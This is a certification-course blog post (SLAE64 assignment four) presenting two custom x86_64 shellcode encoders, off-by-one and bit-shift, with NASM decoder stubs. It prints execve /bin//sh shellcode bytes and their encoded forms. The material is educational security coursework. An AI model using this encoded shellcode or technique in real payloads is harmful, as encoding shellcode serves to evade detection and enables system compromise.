The fourth assignment of the SLAE64 exam states:

  • Create a custom encoding scheme like the “insertion encoder” we showed you
  • PoC with using execve-stack as the shellcode to encode with your schema and execute

For this assignment I wrote a script which supports two encoders and it can also help to decode shellcode.

I wrote a simple “off-by-one” encoder which increments each byte by 0x1. It’s obviously a pun. Decoding this is simply a matter of decrementing each encountered byte by 0x1.

The second encoder does a bit shift to the right by two positions. I chose this one because it demonstrates the power of assembly as it can be decoded with a single instruction: rol.

Let’s generate the encoded shellcode using the two encoders:

jasper@slae64:~/exam/slae64.git/assignment-4$ python3 encoder.py  --format nasm --offbyone 0x48 0x31 0xc0 0x50 0x48 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73 0x68 0x53 0x48 0x89 0xe7 0x50 0x48 0x89 0xe2 0x57 0x48 0x89 0xe6 0x48 0x83 0xc0 0x3b 0x0f 0x05
0x49,0x32,0xc1,0x51,0x49,0xbc,0x30,0x63,0x6a,0x6f,0x30,0x30,0x74,0x69,0x54,0x49,0x8a,0xe8,0x51,0x49,0x8a,0xe3,0x58,0x49,0x8a,0xe7,0x49,0x84,0xc1,0x3c,0x10,0x6

and:

jasper@slae64:~/exam/slae64.git/assignment-4$ python3 encoder.py --format nasm --shifter 0x48 0x31 0xc0 0x50 0x48 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73 0x68 0x53 0x48 0x89 0xe7 0x50 0x48 0x89 0xe2 0x57 0x48 0x89 0xe6 0x48 0x83 0xc0 0x3b 0x0f 0x05
0x12,0x4c,0x30,0x14,0x12,0xee,0xcb,0x98,0x5a,0x9b,0xcb,0xcb,0xdc,0x1a,0xd4,0x12,0x62,0xf9,0x14,0x12,0x62,0xb8,0xd5,0x12,0x62,0xb9,0x12,0xe0,0x30,0xce,0xc3,0x41

The first decoder (off-by-one) will use the jmp call pop technique that was discussed in the course. This method leverages the side-effect of the call instruction to locate the shellcode. In order for the CPU to know what to execute after a routine that gets called, it pushes the address for the next instruction (after the call) onto the stack. If we store our shellcode right after the call…we get that address on the stack which we can then conveniently pop to retrieve it.

The second encoder (shifter) uses RIP relative addressing which is feature of the x86_64 CPU where we use the known offset relative to our instruction pointer at a given instruction to locate the shellcode elsewhere. For this we use the NASM rel directive.

Initially I was using a scratch register to perform the actual decoding in, but we can shrink the shellcode significantly by directly referencing the byte of shellcode we’re decoding!

So we can simply use this:

    ; ...
decoder:
    rol byte [rsi], 2
    ; ...

rather than:

    ; ...
    xor rdx, rdx
decoder:
    mov dl, byte [rsi]
    rol dl, 2
    mov byte [rsi], dl
    ; ...

Including 32 bytes of encoded shellcode my programs come in at 54 bytes for the shifter decoder and 52 bytes for the off-by-one decoder!

asciicast

Wrapping up

I have uploaded my code to jasperla/slae64 on GitHub:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614